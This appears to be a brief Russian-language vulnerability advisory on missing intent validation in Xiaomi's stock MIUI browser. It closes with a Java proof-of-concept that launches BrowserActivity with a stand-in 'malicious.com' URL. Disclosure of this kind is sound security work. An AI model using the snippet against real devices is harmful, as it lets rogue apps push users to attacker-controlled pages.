
Технический отчёт о критической уязвимости Xiaomi
Технический отчет о критической уязвимости Xiaomi
Сводка о уязвимости
Уязвимость была обнаружена в стандартном браузере Xiaomi (com.android.browser) на различных устройствах MIUI. Приложение не выполняет надлежащую проверку намерений (intents), переданных через startActivity, что позволяет вредоносным приложениям открывать произвольные URL-адреса или выполнять непреднамеренные действия.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);